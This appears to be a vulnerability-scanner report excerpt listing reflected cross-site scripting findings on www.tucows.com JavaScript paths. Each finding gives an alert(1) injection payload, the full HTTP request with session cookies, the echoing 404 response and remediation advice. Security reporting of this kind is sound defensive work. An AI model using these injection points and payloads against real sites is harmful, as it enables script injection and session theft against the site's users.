Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images41642"-alert(1)-"3787a403d76/newassets/includes/js/aalib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:19 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7b02"-alert(1)-"7b6e920b807 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsf7b02"-alert(1)-"7b6e920b807/includes/js/aalib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:26 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56eb6"-alert(1)-"cf82ccc0327 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes56eb6"-alert(1)-"cf82ccc0327/js/aalib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:37 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22c99"-alert(1)-"55fa4663456 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js22c99"-alert(1)-"55fa4663456/aalib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:48 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c02"-alert(1)-"c3378b8f5df was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/aalib.js51c02"-alert(1)-"c3378b8f5df HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:59 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.261. http://www.tucows.com/images/newassets/includes/js/aalib.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/aalib.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85680"-alert(1)-"13364046c33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/aalib.js?85680"-alert(1)-"13364046c33=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1638"-alert(1)-"93eb7715e1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagese1638"-alert(1)-"93eb7715e1d/newassets/includes/js/ajaxlib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:22 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94b97"-alert(1)-"7385601d3b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets94b97"-alert(1)-"7385601d3b4/includes/js/ajaxlib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:32 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5955"-alert(1)-"19d51f958d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includesc5955"-alert(1)-"19d51f958d8/js/ajaxlib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0d6e"-alert(1)-"900705e6011 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/jsf0d6e"-alert(1)-"900705e6011/ajaxlib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72931"-alert(1)-"45543eb08c1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/ajaxlib.js72931"-alert(1)-"45543eb08c1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:04 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.267. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/ajaxlib.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4c98"-alert(1)-"3068e25c5c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/ajaxlib.js?d4c98"-alert(1)-"3068e25c5c8=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:09 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fca30"-alert(1)-"22e394819af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesfca30"-alert(1)-"22e394819af/newassets/includes/js/show_layer.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:20 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
